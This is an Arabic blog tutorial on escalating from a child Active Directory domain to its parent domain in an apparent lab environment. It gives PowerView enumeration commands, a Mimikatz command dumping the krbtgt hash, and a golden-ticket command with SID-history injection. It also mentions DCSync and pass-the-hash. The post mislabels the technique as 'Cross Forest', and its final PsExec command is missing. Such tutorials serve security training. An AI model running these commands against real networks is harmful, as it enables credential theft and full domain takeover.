Domain Privilege Escalation - Child to Parent
السلام عليكم ورحمة الله وبركاته
الحمد لله على جميع نِعمه علينا ما علمنا منها وما لم نعلم حمداً والصلاة والسلام على نبينا محمد اشرف الخلق والمرسلين, اما بعد:
مقدمة:
في هذي المقالة راح نشرح التكينك السادس لي الـDomain Privilege وهو الـCross Forest
قبل نبدا شرح التكنيك خلونا نعرف ايش هو فكرة الـCross Forest؟
نفترض انه عندنا نطاق اسمه dollarcorp.moneycorp.local
نلاحظ في اسم النطاق انه dollarcorp يعتبر child او ابن لي الـmoneycorp
ف لو نفترض انه وصلنا الى Domain Controller الخاص في الـdollarcorp لكن ودنا نوصل الى الـDomain Controller الخاص في الاب اللي هو moneycorp.local
هذي فكرة مقالتنا لليوم انه نحاول نوصل الى الـDomain Controller الخاص في الاب اللي هو moneycorp
متطلبات التكنيك:
1- SID of the enterprise admins group
2- SID of dollarcorp Domain
3- Krbtgt hash
الشرح:
في بداية الشرح راح نسوي Load لي اداة PowerView_dev عن طريق هذا الامر:
Import-Moudle .\PowerView_dev.ps1
عن طريق هذا الامر راح نستخرج المتطلب الاول اللي هو الـSID الخاص في قروب Enterprise Admins الموجود في النطاق moneycorp
Get-NetGroup -Identity "Enterprise Admins" -Domain moneycorp.local
عن طريق هذا الامر راح نستخرج المتطلب الثاني SID of dollarcorp domain :
Get-DomainSID
المتطلب الثالث يكون موجود في الـDomain Controller الخاص في الـchild اللي هو dollarcorp
راح ادخل للي الـDomain Controller عن طريق هذا الامر بما انه عندي مستخدم ضمن قروب Domain Admins في نطاق dollarcorp:
Enter-PSSession -ComputerName dcorp-dc
الان راح اسوي استخرج ال hash of krbtgt عن طريق اداة Mimikatz عن طريق هذا الامر:
.\mimikatz.exe "lsadump::lsa /patch" "exit"
الان استخرجنا جميع المتطلبات اللي راح توصلنا الى Domian Controller الخاص في الاب اللي هو moneycorp
الان راح افتح جلسة Powershell بصلاحية Administrator
وراح انفذ امر عن طريق اداة Mimikatz عشان نحصل على الـTGS الخاص في krbtgt service :
kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /ptt
طبعا في هذا الامر راح تعوض المتطلبات اللي استخرجناها قبل قليل
1- الـsids راح تعوض مكانها الـSID of Enterprise Admins
2- الـsid راح تعوض مكانها SID of dollarcorp domain
3- الـkrbtgt راح تعوض مكانه Hash of krbtgt
4 -الـDomain راح تعوض مكانه اسم child domain اللي انت متواجد عليه
الباقي من الامر راح تخليه نفس ماهو
بعد مانفذنا الامر راح يتم حقن الـTGS الخاصة بالسيرفس krbtgt في الميموري وعشان نتاكد راح ننفذ هذا الامر:
klist
الان تاكدنا انه تم حقن الـTGS
الان في اكثر من طريقة راح تمكنا من تنفيذ OS command على الـDomain Controller الخاص في الاب moneycorp ممكن ننفذ dcsync بحيث ناخذ الـNTLM Hahs الخاص فيAdministrator الموجود في نطاق الاب وبعد كذا تسوي تكينك PassTheHash وتدخل للجهاز او تنفذ schuldeing tasks لكن هذي الطريقتين طويلة وتاخذ وقت في طريقة اخرى اسرع
الطريقة الاخرى انه ننزل اداة PsExec من موقع مايكروسوفت وندخل لي الـDomain Controller الخاص في الاب moneycorp عن طريق هذا الامر:
الى هنا وصلنا لنهاية المقالة وتمكنا من الوصول الى نطاق الاب عن طريق نطاق الابن
شاكر لكم.
التعليقات (0)
لايوجد لديك حساب في عالم البرمجة؟
تحب تنضم لعالم البرمجة؟ وتنشئ عالمك الخاص، تنشر المقالات، الدورات، تشارك المبرمجين وتساعد الآخرين، اشترك الآن بخطوات يسيرة !